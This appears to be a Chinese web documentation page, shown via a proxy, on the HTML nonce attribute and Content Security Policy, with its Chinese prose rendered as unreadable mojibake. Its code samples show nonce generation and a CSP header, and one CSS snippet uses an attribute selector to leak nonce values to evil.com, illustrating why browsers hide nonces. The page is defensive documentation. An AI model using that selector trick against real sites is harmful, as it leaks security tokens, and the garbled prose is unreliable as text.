Baseline Widely available
nonce å
¨å±å±æ§æ¯å®ä¹äºå¯ç å¦ nonceï¼âåªä½¿ç¨ä¸æ¬¡çæ°åâï¼çå
容å±æ§ï¼å
容å®å
¨çç¥å¯ä»¥ä½¿ç¨å®æ¥ç¡®å®æ¯å¦å
许对ç»å®å
ç´ è¿è¡è·åã
nonce å±æ§å¯ç¨äºå
许对ç¹å®èµæºçè·åï¼å¦å
èèæ¬ææ ·å¼å
ç´ ãå®å¯ä»¥å¸®å©ä½ é¿å
ä½¿ç¨ CSP unsafe-inline æ令ï¼è¯¥æ令ä¼å
è®¸ä½ è·åææçå
èèæ¬ææ ·å¼èµæºã
å¤æ³¨ï¼ åªæå¨æ æ³é¿å
使ç¨ä¸å®å
¨çå
èèæ¬ææ ·å¼å
容æ¶ï¼æä½¿ç¨ nonceãå¦æä¸éè¦ nonceï¼å°±ä¸è¦ä½¿ç¨ãå¦æèæ¬æ¯éæçï¼ä¹å¯ä»¥ä½¿ç¨ CSP æ£åå¼æ¥ä»£æ¿ãï¼è¯·åé
ä¸å®å
¨å
èèæ¬ä¸ç使ç¨è¯´æï¼ãå§ç»å°½éå
åå©ç¨ CSP ä¿æ¤ï¼å¹¶å°½å¯è½é¿å
ä½¿ç¨ nonce æä¸å®å
¨çå
èèæ¬ã
ä½¿ç¨ nonce æºå¶å 许å èèæ¬éè¦å 个æ¥éª¤ï¼
çææéå¼ä»ä½ ç web æå¡å¨ä¸ï¼ä½¿ç¨ä¸ä¸ªå¯ç å¦å®å ¨çéæºæ°çæå¨çæè³å° 128 ä½ç base64 ç¼ç çéæºå符串ãæ¯æ¬¡å 载页é¢æ¶ï¼åºè¯¥ä»¥ä¸åçæ¹å¼çæ nonceï¼nonce åªè½çæä¸æ¬¡ï¼ï¼ãä¾å¦ï¼å¨ nodejs ä¸ï¼åºè¯¥è¿æ ·åï¼
const crypto = require("crypto");
crypto.randomBytes(16).toString("base64");
// '8IBTHwOdqNKAWeKl7plt8g=='
å端代ç çæç nonce ç°å¨åºè¯¥å¯ç¨äºä½ å¸æå 许使ç¨çå èèæ¬ï¼
<script nonce="8IBTHwOdqNKAWeKl7plt8g==">
// â¦
</script>
æåï¼ä½ éè¦å¨ Content-Security-Policy æ 头ä¸åé nonce å¼ï¼éè¦å¨æ¤å¼åé¢éå nonce-ï¼ï¼
Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='
åºäºå®å
¨èèï¼nonce å
容å±æ§æ¯éèçï¼å°è¿å空å符串ï¼ã
script.getAttribute("nonce"); // è¿å空å符串
nonce å±æ§æ¯è®¿é® nonce çå¯ä¸æ¹æ³ï¼
script.nonce; // è¿å nonce å¼
Nonce éèæå©äºé²æ¢æ»å»è éè¿è½ä»å 容å±æ§ä¸æåæ°æ®çæºå¶æ³é² nonce æ°æ®ï¼æ¯å¦è¿æ ·ï¼
script[nonce~="whatever"] {
background: url("https://evil.com/nonce?whatever");
}
RetroSearch is an open source project built by @garambo | Open a GitHub Issue
Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo
HTML:
3.2
| Encoding:
UTF-8
| Version:
0.7.4